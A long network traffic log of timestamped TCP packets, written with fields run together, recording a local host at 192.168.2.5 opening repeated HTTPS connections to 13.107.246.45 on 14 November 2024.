                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:38.376116991 CET4434981213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:38.384310961 CET4434980613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:38.384452105 CET4434980613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:38.385134935 CET49806443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:38.385761023 CET49806443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:38.385761023 CET49806443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:38.385781050 CET4434980613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:38.385792017 CET4434980613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:38.388026953 CET49813443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:38.388051987 CET4434981313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:38.388279915 CET49813443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:38.388279915 CET49813443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:38.388303995 CET4434981313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:38.548266888 CET4434980913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:38.549360037 CET49809443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:38.549401045 CET4434980913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:38.549873114 CET49809443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:38.549881935 CET4434980913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:38.683264971 CET4434980913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:38.683343887 CET4434980913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:38.683427095 CET49809443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:38.683706999 CET49809443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:38.683706999 CET49809443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:38.683762074 CET4434980913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:38.683790922 CET4434980913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:38.687084913 CET49814443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:38.687191963 CET4434981413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:38.687278032 CET49814443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:38.687438965 CET49814443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:38.687462091 CET4434981413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:38.900319099 CET4434981013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:38.900990963 CET49810443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:38.901022911 CET4434981013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:38.901700974 CET49810443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:38.901709080 CET4434981013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.037728071 CET4434981113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.038584948 CET49811443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.038671017 CET4434981113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.039279938 CET49811443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.039294004 CET4434981113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.043740988 CET4434981013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.043827057 CET4434981013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.043889046 CET49810443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.044255972 CET49810443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.044281006 CET4434981013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.044300079 CET49810443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.044306993 CET4434981013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.048222065 CET49815443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.048280954 CET4434981513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.048396111 CET49815443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.048768044 CET49815443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.048783064 CET4434981513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.110238075 CET4434981313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.110985041 CET49813443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.111018896 CET4434981313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.111598969 CET49813443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.111607075 CET4434981313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.123425961 CET4434981213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.123954058 CET49812443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.123984098 CET4434981213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.124492884 CET49812443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.124499083 CET4434981213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.172597885 CET4434981113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.172765970 CET4434981113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.173067093 CET49811443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.173206091 CET49811443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.173206091 CET49811443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.173261881 CET4434981113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.173290968 CET4434981113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.177031040 CET49816443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.177134991 CET4434981613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.177223921 CET49816443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.177403927 CET49816443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.177432060 CET4434981613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.241194963 CET4434981313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.241261959 CET4434981313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.241628885 CET49813443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.241668940 CET49813443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.241668940 CET49813443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.241697073 CET4434981313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.241710901 CET4434981313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.245620012 CET49817443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.245676041 CET4434981713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.246058941 CET49817443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.246257067 CET49817443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.246267080 CET4434981713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.261121035 CET4434981213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.261190891 CET4434981213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.261307001 CET4434981213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.261424065 CET49812443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.261424065 CET49812443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.261604071 CET49812443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.261629105 CET4434981213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.261645079 CET49812443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.261651993 CET4434981213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.266283035 CET49818443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.266374111 CET4434981813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.266468048 CET49818443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.266753912 CET49818443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.266789913 CET4434981813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.487580061 CET4434981413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.514133930 CET49814443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.514183998 CET4434981413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.514626026 CET49814443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.514632940 CET4434981413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.645591021 CET4434981413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.645687103 CET4434981413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.645739079 CET4434981413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.645742893 CET49814443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.645896912 CET49814443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.646209955 CET49814443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.646234035 CET4434981413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.646250010 CET49814443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.646256924 CET4434981413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.650238991 CET49819443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.650286913 CET4434981913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.650460958 CET49819443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.650732994 CET49819443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.650753021 CET4434981913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.922830105 CET4434981613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.923408985 CET49816443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.923491001 CET4434981613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.923954010 CET49816443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.923966885 CET4434981613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.982358932 CET4434981713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.982937098 CET49817443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.982966900 CET4434981713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.983288050 CET49817443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.983294964 CET4434981713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.049616098 CET4434981813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.050149918 CET49818443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.050189018 CET4434981813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.050628901 CET49818443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.050640106 CET4434981813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.052421093 CET4434981613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.052508116 CET4434981613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.052562952 CET49816443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.052675962 CET49816443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.052697897 CET4434981613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.052711964 CET49816443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.052722931 CET4434981613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.055474997 CET49820443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.055511951 CET4434982013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.055576086 CET49820443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.055700064 CET49820443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.055711985 CET4434982013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.112734079 CET4434981713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.113136053 CET4434981713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.113301039 CET49817443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.113424063 CET49817443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.113447905 CET4434981713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.113460064 CET49817443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.113465071 CET4434981713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.116178036 CET49821443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.116205931 CET4434982113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.116267920 CET49821443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.116430044 CET49821443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.116436958 CET4434982113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.191752911 CET4434981813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.191828966 CET4434981813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.191925049 CET49818443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.191950083 CET4434981813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.192316055 CET49818443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.192555904 CET49818443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.192557096 CET49818443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.192603111 CET4434981813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.192632914 CET4434981813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.196482897 CET49822443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.196527958 CET4434982213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.196590900 CET49822443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.196841955 CET49822443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.196860075 CET4434982213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.244961977 CET4434981513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.247189045 CET49815443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.247189045 CET49815443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.247217894 CET4434981513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.247247934 CET4434981513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.372423887 CET4434981913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.373022079 CET49819443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.373064041 CET4434981913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.373498917 CET49819443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.373506069 CET4434981913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.376306057 CET4434981513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.376384974 CET4434981513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.376449108 CET49815443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.376666069 CET49815443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.376666069 CET49815443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.376692057 CET4434981513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.376702070 CET4434981513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.379525900 CET49823443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.379554987 CET4434982313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.379673958 CET49823443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.379832983 CET49823443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.379846096 CET4434982313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.499840975 CET4434981913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.499926090 CET4434981913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.500365973 CET49819443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.500461102 CET49819443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.500461102 CET49819443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.500514030 CET4434981913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.500546932 CET4434981913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.503433943 CET49824443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.503490925 CET4434982413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.503567934 CET49824443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.503721952 CET49824443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.503740072 CET4434982413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.800456047 CET4434982013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.809320927 CET49820443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.809345007 CET4434982013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.809808969 CET49820443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.809814930 CET4434982013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.864288092 CET4434982113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.878077030 CET49821443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.878104925 CET4434982113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.886790991 CET49821443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.886810064 CET4434982113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.939040899 CET4434982013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.939126968 CET4434982013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.939179897 CET49820443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.942987919 CET49820443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.943001986 CET4434982013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.943027973 CET49820443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.943032980 CET4434982013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.946975946 CET49825443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.947079897 CET4434982513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.947184086 CET49825443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.947329998 CET49825443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.947351933 CET4434982513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.985224962 CET4434982213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.985766888 CET49822443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.985776901 CET4434982213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.986363888 CET49822443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.986367941 CET4434982213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:41.044038057 CET4434982113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:41.044245958 CET4434982113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:41.044316053 CET49821443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:41.044626951 CET49821443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:41.044640064 CET4434982113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:41.044650078 CET49821443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:41.044653893 CET4434982113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:41.047261000 CET49826443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:41.047319889 CET4434982613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:41.047405958 CET49826443192.168.2.513.107.246.45
